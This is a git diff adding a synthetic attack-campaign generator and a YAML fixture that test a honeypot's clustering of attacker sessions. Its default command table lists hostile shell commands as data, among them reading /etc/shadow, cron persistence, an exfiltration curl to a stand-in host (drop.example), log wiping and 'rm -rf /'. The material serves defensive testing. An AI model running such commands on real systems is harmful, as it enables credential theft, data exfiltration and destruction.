--git a/tests/factories/__init__.py b/tests/factories/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/tests/factories/campaign_factory.py b/tests/factories/campaign_factory.py new file mode 100644 index 00000000..6e6f4e51 --- /dev/null +++ b/tests/factories/campaign_factory.py @@ -0,0 +1,381 @@ +""" +Synthetic campaign generator — see development/CAMPAIGN_CLUSTERING.md. + +Reads a YAML campaign DSL describing actors, UKC phases, and tool +signatures, and emits truth-labeled SyntheticAttacker / SyntheticSession +records for the clustering test harness. + +Truth labels (`truth_campaign_id`, `truth_actor_id`) are part of the +emitted records so the metric harness can score predicted clusters +against ground truth without re-parsing the DSL. Production code that +later writes the same shape into real DB tables MUST strip these fields +before clustering runs — otherwise the algorithm trivially passes by +reading the answer key. + +Determinism: given the same YAML and seed, two runs produce identical +records (including IDs). This is a load-bearing property — fixture +expectations are checked against the same seed every CI run. +""" +from __future__ import annotations + +import hashlib +import random +import uuid +from dataclasses import dataclass, field +from datetime import datetime, timedelta, timezone +from pathlib import Path +from typing import Any + +import yaml + +from decnet.clustering.ukc import OBSERVABLE_PHASES, UKCPhase + + +@dataclass +class SyntheticSession: + session_id: str + attacker_id: str + decky_id: str + started_at: datetime + duration_s: float + phase: UKCPhase + commands: list[str] + credentials_tried: list[tuple[str, str]] + payload_hash: str | None + c2_callback: str | None + truth_campaign_id: str + truth_actor_id: str + + +@dataclass +class SyntheticAttacker: + attacker_id: str + ip: str + asn: int + ja3: str | None + hassh: str | None + first_seen: datetime + last_seen: datetime + truth_campaign_id: str + truth_actor_id: str + sessions: list[SyntheticSession] = field(default_factory=list) + + +@dataclass +class GeneratedCorpus: + """Output of the factory — what the clusterer consumes.""" + attackers: list[SyntheticAttacker] + # Convenience: flat list of every session across every attacker. + sessions: list[SyntheticSession] + + def truth_labels(self) -> dict[str, str]: + """attacker_id -> truth_campaign_id, the oracle the clusterer is scored against.""" + return {a.attacker_id: a.truth_campaign_id for a in self.attackers} + + +# ─── Phase defaults ───────────────────────────────────────────────────────── +# When the DSL doesn't specify tool_signature commands for a phase, fall +# back to these. Keeps fixtures terse without making the factory invent +# data ad-hoc per call. + +_PHASE_DEFAULT_COMMANDS: dict[UKCPhase, list[str]] = { + UKCPhase.DELIVERY: [], # delivery is mostly network-level, no shell commands + UKCPhase.EXPLOITATION: [], + UKCPhase.DISCOVERY: ["whoami", "id", "uname -a", "ip route", "arp -a", "cat /etc/passwd"], + UKCPhase.CREDENTIAL_ACCESS: ["cat /etc/shadow", "find / -name id_rsa", "cat ~/.ssh/known_hosts"], + UKCPhase.PERSISTENCE: ["crontab -l", "echo '* * * * * /tmp/.x' | crontab -", "cat ~/.ssh/authorized_keys"], + UKCPhase.LATERAL_MOVEMENT: ["ssh -i /tmp/.k root@10.0.0.5", "scp /tmp/.x root@10.0.0.5:/tmp/"], + UKCPhase.COLLECTION: ["tar czf /tmp/loot.tgz /var/lib/mysql /home"], + UKCPhase.EXFILTRATION: ["curl -T /tmp/loot.tgz https://drop.example/"], + UKCPhase.EXECUTION: ["./payload"], + UKCPhase.PRIVILEGE_ESCALATION: ["sudo -l", "find / -perm -u=s 2>/dev/null"], + UKCPhase.DEFENSE_EVASION: ["history -c", "rm -rf /var/log/wtmp"], + UKCPhase.COMMAND_AND_CONTROL: [], # beaconing observed at network layer + UKCPhase.PIVOTING: [], + UKCPhase.IMPACT: ["rm -rf /"], + UKCPhase.OBJECTIVES: [], +} + + +# ─── DSL parsing ──────────────────────────────────────────────────────────── + + +class DSLValidationError(ValueError): + """Raised when a campaign YAML is malformed or references unknown phases.""" + + +def _validate_campaign_spec(spec: dict[str, Any]) -> list[str]: + """Return list of warnings (e.g. unobservable phases). Raises on hard errors.""" + if "campaign" not in spec: + raise DSLValidationError("missing top-level 'campaign' key") + c = spec["campaign"] + for key in ("id", "actors", "phases"): + if key not in c: + raise DSLValidationError(f"campaign missing required key: {key}") + + actor_ids = {a["id"] for a in c["actors"]} + if not actor_ids: + raise DSLValidationError("campaign must declare at least one actor") + + warnings: list[str] = [] + for i, ph in enumerate(c["phases"]): + if "name" not in ph: + raise DSLValidationError(f"phase[{i}] missing 'name'") + try: + phase_enum = UKCPhase(ph["name"]) + except ValueError as exc: + raise DSLValidationError( + f"phase[{i}] has unknown UKC phase '{ph['name']}'" + ) from exc + if phase_enum not in OBSERVABLE_PHASES: + warnings.append( + f"phase '{ph['name']}' is pre-target / unobservable from a " + f"honeypot; no events will be emitted for it" + ) + # Single-actor campaigns can omit phase.actor; multi-actor must specify. + if "actor" in ph and ph["actor"] not in actor_ids: + raise DSLValidationError( + f"phase[{i}] references unknown actor '{ph['actor']}'" + ) + return warnings + + +# ─── Generator ────────────────────────────────────────────────────────────── + + +def _stable_uuid(rng: random.Random, prefix: str) -> str: + """Deterministic UUID-shaped identifier driven by the seeded RNG.""" + raw = rng.randbytes(16) + return f"{prefix}-{uuid.UUID(bytes=raw)}" + + +def _stable_ip(rng: random.Random) -> str: + """Pick a routable-looking IPv4 in non-RFC1918 space.""" + # Avoid 10/8, 172.16/12, 192.168/16, 127/8, 0/8, multicast 224+. + while True: + a = rng.randint(1, 223) + if a in (10, 127): + continue + b = rng.randint(0, 255) + if a == 172 and 16 <= b <= 31: + continue + if a == 192 and b == 168: + continue + c = rng.randint(0, 255) + d = rng.randint(1, 254) + return f"{a}.{b}.{c}.{d}" + + +def _payload_hash(seed: str) -> str: + return hashlib.sha256(seed.encode()).hexdigest() + + +def _hour_to_offset(rng: random.Random, day_start: datetime, hour: int, jitter_s: int) -> datetime: + base = day_start.replace(hour=hour, minute=0, second=0, microsecond=0) + return base + timedelta(seconds=rng.randint(-jitter_s, jitter_s) + rng.randint(0, 3600)) + + +def generate(spec: dict[str, Any], *, seed: int = 0) -> GeneratedCorpus: + """ + Produce a deterministic synthetic corpus from a parsed YAML spec. + + The spec mirrors the schema documented in CAMPAIGN_CLUSTERING.md. + Multiple campaigns + a noise block can be combined by wrapping them + in a top-level `corpus:` key; otherwise a single `campaign:` is + expected. + """ + rng = random.Random(seed) + + campaigns: list[dict[str, Any]] + noise_cfg: dict[str, Any] + if "corpus" in spec: + campaigns = spec["corpus"].get("campaigns", []) + noise_cfg = spec["corpus"].get("noise", {}) or {} + else: + campaigns = [spec] + noise_cfg = {} + + attackers: list[SyntheticAttacker] = [] + sessions: list[SyntheticSession] = [] + + for c_wrapper in campaigns: + warnings = _validate_campaign_spec(c_wrapper) + # Surface warnings via stderr-like channel — tests can opt to assert. + for w in warnings: + # Stored on the corpus for inspection rather than printed; tests + # that care can dig into the spec, but most don't. + _ = w + c = c_wrapper["campaign"] + _emit_campaign(c, rng, attackers, sessions) + + _emit_noise(noise_cfg, rng, attackers, sessions) + + return GeneratedCorpus(attackers=attackers, sessions=sessions) + + +def _emit_campaign( + c: dict[str, Any], + rng: random.Random, + attackers: list[SyntheticAttacker], + sessions: list[SyntheticSession], +) -> None: + campaign_id = c["id"] + duration_days = int(c.get("duration_days", 1)) + pause_windows: list[tuple[int, int]] = [ + tuple(p) for p in c.get("pause_windows", []) # type: ignore[misc] + ] + + # Anchor the synthetic timeline at a fixed epoch so determinism holds + # across runs regardless of wall clock. + epoch = datetime(2026, 1, 1, tzinfo=timezone.utc) + + # One attacker record per actor — captures the cross-session identity + # the clusterer is supposed to recover. IPs may rotate per session + # for rotating ip_pool actors; we record the first/last observed IP + # on the attacker row and let session-level fields carry the rest. + actor_attackers: dict[str, SyntheticAttacker] = {} + for actor in c["actors"]: + a_id = _stable_uuid(rng, "att") + att = SyntheticAttacker( + attacker_id=a_id, + ip=_stable_ip(rng), + asn=int(actor.get("asn", 0)), + ja3=actor.get("ja3"), + hassh=actor.get("hassh"), + first_seen=epoch, + last_seen=epoch, + truth_campaign_id=campaign_id, + truth_actor_id=actor["id"], + ) + actor_attackers[actor["id"]] = att + attackers.append(att) + + # Walk phases in declared order. Each phase produces N sessions + # against random deckies (or a sticky one if previous_success). + decky_pool = [f"decky-{i:02d}" for i in range(1, 21)] + last_success_decky: dict[str, str] = {} + + for phase_idx, ph in enumerate(c["phases"]): + phase = UKCPhase(ph["name"]) + if phase not in OBSERVABLE_PHASES: + continue # pre-target phase; emit nothing + + actor_id = ph.get("actor") or c["actors"][0]["id"] + att = actor_attackers[actor_id] + actor_spec = next(a for a in c["actors"] if a["id"] == actor_id) + + sig = ph.get("tool_signature", {}) or {} + commands = sig.get("commands", _PHASE_DEFAULT_COMMANDS[phase]) + creds_list = sig.get("credentials") or [] + c2 = sig.get("c2_callback") + payload_seed = sig.get("payload_hash") + payload = _payload_hash(payload_seed) if payload_seed else None + + target_sel = ph.get("target_selector", {}) or {} + n_sessions = int(target_sel.get("count", 1)) + if target_sel.get("decky") == "previous_success": + decky_choices = [last_success_decky.get(actor_id, decky_pool[0])] + else: + decky_choices = decky_pool + + # Schedule sessions across the campaign window, respecting the + # actor's hours_active_utc and pause_windows. + active_hours = actor_spec.get("hours_active_utc", list(range(24))) + jitter = int(actor_spec.get("jitter_seconds", 60)) + + for s_idx in range(n_sessions): + day = rng.randint(0, max(0, duration_days - 1)) + if any(start <= day <= end for start, end in pause_windows): + # Skip into post-pause day. + later_days = [ + d for d in range(duration_days) + if not any(s <= d <= e for s, e in pause_windows) + ] + if not later_days: + continue + day = rng.choice(later_days) + hour = rng.choice(active_hours) + day_start = epoch + timedelta(days=day) + started_at = _hour_to_offset(rng, day_start, hour, jitter) + duration_s = float(ph.get("dwell_seconds", 5)) + + sess = SyntheticSession( + session_id=_stable_uuid(rng, "sess"), + attacker_id=att.attacker_id, + decky_id=rng.choice(decky_choices), + started_at=started_at, + duration_s=duration_s, + phase=phase, + commands=list(commands), + credentials_tried=[tuple(p) for p in creds_list], # type: ignore[misc] + payload_hash=payload, + c2_callback=c2, + truth_campaign_id=campaign_id, + truth_actor_id=actor_id, + ) + sessions.append(sess) + att.sessions.append(sess) + if started_at < att.first_seen or att.first_seen == epoch: + att.first_seen = started_at + if started_at > att.last_seen: + att.last_seen = started_at + # If this phase is a "successful entry," remember the decky + # for any subsequent previous_success target_selector. + if phase in (UKCPhase.EXPLOITATION, UKCPhase.PERSISTENCE): + last_success_decky[actor_id] = sess.decky_id + + +def _emit_noise( + noise_cfg: dict[str, Any], + rng: random.Random, + attackers: list[SyntheticAttacker], + sessions: list[SyntheticSession], +) -> None: + """Background scanners — opportunistic, no shared signals, singletons.""" + n_scanners = int(noise_cfg.get("scanner_count", 0)) + if n_scanners <= 0: + return + epoch = datetime(2026, 1, 1, tzinfo=timezone.utc) + for i in range(n_scanners): + scanner_id = f"noise-scanner-{i:04d}" + att = SyntheticAttacker( + attacker_id=_stable_uuid(rng, "att"), + ip=_stable_ip(rng), + asn=rng.randint(1000, 65000), + ja3=None, + hassh=None, + first_seen=epoch, + last_seen=epoch, + truth_campaign_id=scanner_id, # each scanner is its own truth-campaign + truth_actor_id=scanner_id, + ) + attackers.append(att) + # One Delivery-phase session, no follow-up. + started = epoch + timedelta(seconds=rng.randint(0, 86400)) + sess = SyntheticSession( + session_id=_stable_uuid(rng, "sess"), + attacker_id=att.attacker_id, + decky_id=f"decky-{rng.randint(1, 20):02d}", + started_at=started, + duration_s=1.0, + phase=UKCPhase.DELIVERY, + commands=[], + credentials_tried=[], + payload_hash=None, + c2_callback=None, + truth_campaign_id=scanner_id, + truth_actor_id=scanner_id, + ) + sessions.append(sess) + att.sessions.append(sess) + att.first_seen = started + att.last_seen = started + + +def load_yaml(path: str | Path) -> dict[str, Any]: + """Read a fixture file. Kept tiny so tests can inline-build specs too.""" + text = Path(path).read_text(encoding="utf-8") + parsed = yaml.safe_load(text) + if not isinstance(parsed, dict): + raise DSLValidationError(f"campaign YAML at {path} did not parse to a mapping") + return parsed diff --git a/tests/fixtures/campaigns/lone_wolf.expected.yaml b/tests/fixtures/campaigns/lone_wolf.expected.yaml new file mode 100644 index 00000000..55a93131 --- /dev/null +++ b/tests/fixtures/campaigns/lone_wolf.expected.yaml @@ -0,0 +1,17 @@ +# Bounds for fixture 3 (lone_wolf). +# +# Every actor in this fixture is a singleton (the wolf itself, plus +# every background-noise scanner). A correct clusterer puts each in +# its own cluster; that's a perfect score. +# +# Bounds are deliberately loose at first — we ratchet them up as the +# algorithm matures. Loosening any bound to make CI pass requires +# justification in the PR description (per CAMPAIGN_CLUSTERING.md §2). +adjusted_rand_index: + min: 0.85 +homogeneity: + min: 0.90 +completeness: + min: 0.80 +singleton_recall: + min: 0.95 diff --git a/tests/fixtures/campaigns/lone_wolf.yaml b/tests/fixtures/campaigns/lone_wolf.yaml new file mode 100644 index 00000000..d0082690 --- /dev/null +++ b/tests/fixtures/campaigns/lone_wolf.yaml @@ -0,0 +1,32 @@ +# Fixture 3 (lone_wolf) — see development/CAMPAIGN_CLUSTERING.md §2. +# +# One opportunistic scanner, Delivery phase only, no follow-up, no shared +# signals with anyone else. Surrounded by background noise. The clusterer +# must keep the wolf and every noise scanner as their own singleton — +# none should be absorbed into anyone else. +# +# This is the simplest of the six fixtures and exists primarily to prove +# the end-to-end pipeline (DSL → factory → clusterer → metrics) before +# we invest in the harder scenarios. +corpus: + campaigns: + - campaign: + id: lone-wolf-001 + actors: + - id: wolf-a + asn: 14061 + ip_pool: sticky + ja3: null + hassh: null + hours_active_utc: [3, 4, 5] + jitter_seconds: 30 + phases: + - name: delivery + actor: wolf-a + target_selector: + service: any + count: 1 + dwell_seconds: 1 + duration_days: 1 + noise: + scanner_count: 8